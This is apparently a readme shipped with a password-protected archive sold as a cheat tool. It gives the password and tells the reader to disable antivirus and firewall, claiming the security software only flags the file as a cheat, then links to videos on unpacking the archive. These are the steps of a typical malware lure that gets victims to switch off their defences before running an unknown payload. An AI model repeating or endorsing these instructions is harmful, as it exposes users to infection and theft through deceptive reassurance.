﻿**********************************************************************************************************************************
Password: cryptobomber
**********************************************************************************************************************************

READ THE INSTRUCTIONS IN FULL:
1. Disable the antivirus and firewall.
The antivirus can block or delete the file because it knows that it is a cheat code.

If you have Windows 10(11), this video shows how to disable antivirus, if not, google it:
https://youtu.be/apuccBWaNkQ

2. Learn how to unpack the archive by watching this video:
https://youtu.be/r9hpiyzOOTY

**********************************************************************************************************************************